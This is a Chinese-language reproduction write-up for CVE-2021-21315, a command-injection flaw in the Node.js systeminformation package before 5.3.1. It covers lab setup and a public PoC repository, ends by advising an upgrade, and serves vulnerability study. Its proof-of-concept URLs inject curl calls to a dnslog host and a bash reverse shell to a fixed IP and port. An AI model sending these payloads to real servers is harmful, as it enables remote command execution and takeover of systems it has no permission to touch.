（CVE-2021-21315） Node.js systeminformation模块RCE – 作者:linluhaijing

1、    简介

Node.js-systeminformation是用于获取各种系统信息的Node.JS模块它包含多种轻量级功能，可以检索详细的硬件和系统相关信息自发布至今，systeminformation软件包下载次数近3400万。

2、    漏洞描述

该漏洞允许攻击者无回显的进行命令执行。

3、    影响范围

Systeminformation < 5.3.1

4、    漏洞环境

Nodejs下载安装:

wget https://nodejs.org/dist/v12.18.4/node-v12.18.4-linux-x64.tar.xz
tar -xvf node-v12.18.4-linux-x64.tar.xz
mv node-v12.18.4-linux-x64 nodejs
sudo mv nodejs/ /usr/local/sbin/
sudo ln -s /usr/local/sbin/nodejs/bin/node /usr/local/bin/
sudo ln -s /usr/local/sbin/nodejs/bin/npm /usr/local/bin/

下载源码：

git clone https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

开启环境:

Node index.js

5、    复现

访问http://ip:8000/

Poc：

/api/getServices?name=$(curl http:// gh82p1.dnslog.cn)

/api/getServices?name[]=$(curl http:// gh82p1.dnslog.cn)

/api/getServices?name[]=$(bash -i >& /dev/tcp/192.168.2.197/8443 0>&1)

6、    漏洞防御

建议将 systeminformation 及时升级到 5.3.1 或更高版本

https://www.npmjs.com/package/systeminformation

来源：freebuf.com 2021-05-14 11:26:50 by: linluhaijing